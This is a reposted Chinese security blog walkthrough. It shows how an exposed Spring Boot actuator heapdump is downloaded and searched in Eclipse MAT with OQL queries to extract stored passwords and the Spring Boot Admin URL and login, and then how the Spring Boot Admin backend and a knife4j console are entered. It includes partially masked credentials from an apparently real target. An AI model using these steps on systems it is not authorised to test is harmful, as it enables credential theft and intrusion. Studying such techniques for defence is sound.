通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

admin 2024年5月7日07:48:34评论2 views字数 1073阅读3分34秒阅读模式
前置知识
spring.boot.admin.client.password //配置spring boot admin 后台的密码spring.boot.admin.client.url //配置spring boot admin 后台的urlspring.boot.admin.client.username //配置spring boot admin 后台的账号

Spring Boot Admin 后台特征

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
实例复现
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

目录扫描:

https://xxxxxx/actuator

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

下载heapdump

使用mat进行分析

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

使用命令进行password关键词查询

select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("password"))
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

技巧:

使用go into进行查询

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

获取到的账号密码:

knixxxxx:JnrsxxxxxQing!0531!@rexxxxxxx:JnrsxxxxxQing0531rxxxxxx:rxxxxxx/JnrsxxxxxQing_123

获取sping boot admin的url和账号密码

获取到url

select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.url"))
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

访问网站

http://xxxxxxxx2:8000/

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

获取密码

select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.password"))
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

获取用户名

select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.username"))
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

获取到:用户/密码

monxxxx/jnrsxxxxx

成功进入后台

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

4. 补充(knife4j)

knife4j是一个类似于swagger的后端接口程序

它可以设置账号密码,上文读取到的knife4j的密码就可以在knife4j中使用

knife4j

通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

后续可以测试未授权等问题,测试流程就和swagger类似,不再阐述

END

原文始发于微信公众号(前进四安全团队):【黑客揭秘】通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日07:48:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!https://cn-sec.com/archives/2713645.html

发表评论

匿名网友 填写信息